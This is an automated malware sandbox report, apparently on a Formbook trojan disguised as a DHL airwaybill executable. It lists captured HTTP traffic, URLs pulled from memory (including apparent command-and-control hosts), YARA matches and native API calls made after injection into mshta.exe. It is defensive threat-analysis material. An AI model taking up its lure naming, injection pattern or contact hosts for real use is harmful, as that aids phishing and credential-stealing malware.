            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 796
            date: Fri, 06 Sep 2024 07:06:29 GMT
            vary: User-Agent
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 06 Sep 2024 07:06:35 GMT
            Server: Apache
            Content-Length: 16052
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 06 Sep 2024 07:06:37 GMT
            Server: Apache
            Content-Length: 16052
            Connection: close
            Content-Type: text/html
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 06 Sep 2024 07:06:40 GMT
            Server: Apache
            Content-Length: 16052
            Connection: close
            Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 06 Sep 2024 07:06:43 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html; charset=utf-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 06 Sep 2024 07:07:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s1x2%2BpCmcGTg2AG9xhsfwb193NvJ2wC45Dhc0HPu73UdNHzQpMhmpOnY5pvxy3y1U66GANiXpCYFFdKh%2BxwE0oNu8%2BCSvm0HMWTlB%2BpGB73UvKJNDMu%2F0lV6w6pv7%2FZJInOnqB8Dzog%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bec9f097d937c6c-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 06 Sep 2024 07:07:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvouXfpGVf%2FAPyScpXF1FVa%2F8%2BP1Q93%2B7napzLthYxsP2cYS%2BPUI3757UPgKDmaXAw5RV%2FdgjSduHNI5WMTtHfjse6e%2BoJDUocmdGWBQXaKUsfgZX3d6PZPFvwDqY0%2FEftO0r%2FC7k8s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bec9f195faa19a1-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 06 Sep 2024 07:07:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2BWmiFkkzBgAT%2FaSovLL9gC72YXX0XVhHcddRNV655VuUm%2FTFsVSbo8HCw6AtafwWDHxz2r3nm0E8XKRpOkZ6J8V049Ko%2BZYQd%2FzrUfpap01B3KGwas3GGFNgxHke%2FvMF0ol80c5Cmo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bec9f294d8a18fa-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 06 Sep 2024 07:07:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KbTlssbaJYxbcs9Tn0Iz6Wk5E9w0Vai3MHVa6WtctGFDFBoVVoboC4kPLx45IsNOl9kU4T4g2Zu95mXZyJ69iD7%2B0eAeio4S4i87fZVHg6RtZ1pn5yX%2Fe7oknV1hOvb1NwOJ%2F3dN0A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bec9f391b305e86-EWR alt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 06 Sep 2024 07:08:07 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 06 Sep 2024 07:08:10 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 06 Sep 2024 07:08:12 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 06 Sep 2024 07:08:15 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Fri, 06 Sep 2024 07:08:20 GMT Server: Apache X-Powered-By: PHP/8.2.23 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://moveon.cat/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Fri, 06 Sep 2024 07:08:23 GMT Server: Apache X-Powered-By: PHP/8.2.23 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://moveon.cat/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Fri, 06 Sep 2024 07:08:26 GMT Server: Apache X-Powered-By: PHP/8.2.23 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://moveon.cat/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.00000000041F8000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000003C48000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://fedoraproject.org/
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.000000000438A000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000003DDA000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://homebizsuccess.blog/xvas/?FR=J9/McS
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.00000000041F8000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000003C48000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://nginx.net/
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.00000000051AC000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000004BFC000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?FR=vGL9u4UoqpVZZPxrAmsiFiNaZFXain6KGFUZntJW9QYk7
            Source: toceDGfrPzLv.exe, 00000005.00000002.4609561064.0000000005FCC000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.moveon.cat
            Source: toceDGfrPzLv.exe, 00000005.00000002.4609561064.0000000005FCC000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.moveon.cat/bb55/
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.00000000049D2000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.0000000004422000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.0000000004E88000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.00000000048D8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/
            Source: toceDGfrPzLv.exe, 00000005.00000002.4607553499.0000000004E88000.00000004.80000000.00040000.00000000.sdmp, mshta.exe, 00000006.00000002.4607176606.00000000048D8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com/
            Source: mshta.exe, 00000006.00000002.4603364432.0000000002642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: mshta.exe, 00000006.00000002.4603364432.0000000002642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: mshta.exe, 00000006.00000003.2554930126.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: mshta.exe, 00000006.00000002.4603364432.0000000002642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: mshta.exe, 00000006.00000002.4603364432.0000000002642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: mshta.exe, 00000006.00000002.4609609702.00000000079F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            Source: Yara matchFile source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_0042C2E3 NtClose,3_2_0042C2E3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42B60 NtClose,LdrInitializeThunk,3_2_01B42B60
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01B42DF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01B42C70
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B435C0 NtCreateMutant,LdrInitializeThunk,3_2_01B435C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B44340 NtSetContextThread,3_2_01B44340
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B44650 NtSuspendThread,3_2_01B44650
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42BA0 NtEnumerateValueKey,3_2_01B42BA0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42B80 NtQueryInformationFile,3_2_01B42B80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42BF0 NtAllocateVirtualMemory,3_2_01B42BF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42BE0 NtQueryValueKey,3_2_01B42BE0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42AB0 NtWaitForSingleObject,3_2_01B42AB0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42AF0 NtWriteFile,3_2_01B42AF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42AD0 NtReadFile,3_2_01B42AD0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42DB0 NtEnumerateKey,3_2_01B42DB0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42DD0 NtDelayExecution,3_2_01B42DD0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42D30 NtUnmapViewOfSection,3_2_01B42D30
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42D10 NtMapViewOfSection,3_2_01B42D10
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42D00 NtSetInformationFile,3_2_01B42D00
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42CA0 NtQueryInformationToken,3_2_01B42CA0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42CF0 NtOpenProcess,3_2_01B42CF0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42CC0 NtQueryVirtualMemory,3_2_01B42CC0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42C00 NtQueryInformationProcess,3_2_01B42C00
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42C60 NtCreateKey,3_2_01B42C60
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42FB0 NtResumeThread,3_2_01B42FB0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42FA0 NtQuerySection,3_2_01B42FA0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42F90 NtProtectVirtualMemory,3_2_01B42F90
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42FE0 NtCreateFile,3_2_01B42FE0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42F30 NtCreateSection,3_2_01B42F30
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42F60 NtCreateProcessEx,3_2_01B42F60
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42EA0 NtAdjustPrivilegesToken,3_2_01B42EA0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42E80 NtReadVirtualMemory,3_2_01B42E80
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42EE0 NtQueueApcThread,3_2_01B42EE0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42E30 NtWriteVirtualMemory,3_2_01B42E30
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B43090 NtSetValueKey,3_2_01B43090
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B43010 NtOpenDirectoryObject,3_2_01B43010
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B439B0 NtGetContextThread,3_2_01B439B0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B43D10 NtOpenProcessToken,3_2_01B43D10
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B43D70 NtOpenThread,3_2_01B43D70
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED4340 NtSetContextThread,LdrInitializeThunk,6_2_02ED4340
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED4650 NtSuspendThread,LdrInitializeThunk,6_2_02ED4650
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2AF0 NtWriteFile,LdrInitializeThunk,6_2_02ED2AF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2AD0 NtReadFile,LdrInitializeThunk,6_2_02ED2AD0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_02ED2BE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_02ED2BF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_02ED2BA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2B60 NtClose,LdrInitializeThunk,6_2_02ED2B60
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_02ED2EE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_02ED2E80
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2FE0 NtCreateFile,LdrInitializeThunk,6_2_02ED2FE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2FB0 NtResumeThread,LdrInitializeThunk,6_2_02ED2FB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2F30 NtCreateSection,LdrInitializeThunk,6_2_02ED2F30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_02ED2CA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2C60 NtCreateKey,LdrInitializeThunk,6_2_02ED2C60
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02ED2C70
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_02ED2DF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2DD0 NtDelayExecution,LdrInitializeThunk,6_2_02ED2DD0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_02ED2D30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_02ED2D10
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED35C0 NtCreateMutant,LdrInitializeThunk,6_2_02ED35C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED39B0 NtGetContextThread,LdrInitializeThunk,6_2_02ED39B0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2AB0 NtWaitForSingleObject,6_2_02ED2AB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2B80 NtQueryInformationFile,6_2_02ED2B80
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2EA0 NtAdjustPrivilegesToken,6_2_02ED2EA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2E30 NtWriteVirtualMemory,6_2_02ED2E30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2FA0 NtQuerySection,6_2_02ED2FA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2F90 NtProtectVirtualMemory,6_2_02ED2F90
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2F60 NtCreateProcessEx,6_2_02ED2F60
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2CF0 NtOpenProcess,6_2_02ED2CF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2CC0 NtQueryVirtualMemory,6_2_02ED2CC0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2C00 NtQueryInformationProcess,6_2_02ED2C00
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2DB0 NtEnumerateKey,6_2_02ED2DB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED2D00 NtSetInformationFile,6_2_02ED2D00
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED3090 NtSetValueKey,6_2_02ED3090
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED3010 NtOpenDirectoryObject,6_2_02ED3010
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED3D70 NtOpenThread,6_2_02ED3D70
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_02ED3D10 NtOpenProcessToken,6_2_02ED3D10
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_00548BF0 NtCreateFile,6_2_00548BF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_00548D60 NtReadFile,6_2_00548D60
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_00548E50 NtDeleteFile,6_2_00548E50
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_00548EF0 NtClose,6_2_00548EF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_00549050 NtAllocateVirtualMemory,6_2_00549050
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B11F923_2_01B11F92
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AD3FD53_2_01AD3FD5
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AD3FD23_2_01AD3FD2
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BCFF093_2_01BCFF09
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B19EB03_2_01B19EB0
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_0343D3855_2_0343D385
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_0345BE655_2_0345BE65
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_03443AD55_2_03443AD5
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_03443AD25_2_03443AD2
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_03443A8E5_2_03443A8E
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_0343D1655_2_0343D165
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_0343D1645_2_0343D164
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_0343B4055_2_0343B405
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_034458E95_2_034458E9
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05FA84C05_2_05FA84C0
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F897C05_2_05F897C0
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F897BF5_2_05F897BF
